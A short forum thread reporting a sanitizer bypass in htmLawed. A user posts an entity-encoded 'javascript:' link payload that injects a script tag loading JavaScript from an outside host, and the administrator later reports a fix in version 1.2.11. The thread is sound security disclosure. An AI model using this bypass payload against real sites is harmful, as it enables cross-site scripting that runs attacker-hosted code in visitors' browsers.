You are not logged in. Please login or register.

[ Closed ] Bug/exploit with "javascript:"

PHP Labware forum → htmLawed → Bug/exploit with "javascript:"

Pages 1

You must login or register to post a reply

RSS topic feed

Posts: 3

1 Topic by NinCollin 2022-12-28 00:50:04 (edited by NinCollin 2022-12-28 00:50:20)

NinCollin
Member
Offline

Topic: Bug/exploit with "javascript:"

With config option "safe" set to 1, the following snippet is not properly mitigated and presents an exploit:

<a href="javascript&colon;&lpar;function&lpar;&rpar;{document.body.appendChild&lpar;document.createElement&lpar;&#x27;script&#x27;&rpar;&rpar;.src=&#x27;https://scripts.rainynight.city/beanz.js&#x27;;}&rpar;&lpar;&rpar;;">Beans</a>

Certain special characters are replaced with HTML entities, and it's even possible to load external scripts (the script in this example is just an alert window)

2 Reply by patnaik 2023-01-20 16:47:53

patnaik
Administrator
Offline

Re: Bug/exploit with "javascript:"

Thanks for posting. Will follow up.

3 Reply by patnaik 2023-01-23 03:10:48

patnaik
Administrator
Offline

Re: Bug/exploit with "javascript:"

This important security issue is mitigated in the new version of htmLawed (1.2.11).

Posts: 3

Pages 1

You must login or register to post a reply

PHP Labware forum → htmLawed → Bug/exploit with "javascript:"

PHP Labware home | visitors since Sept 2017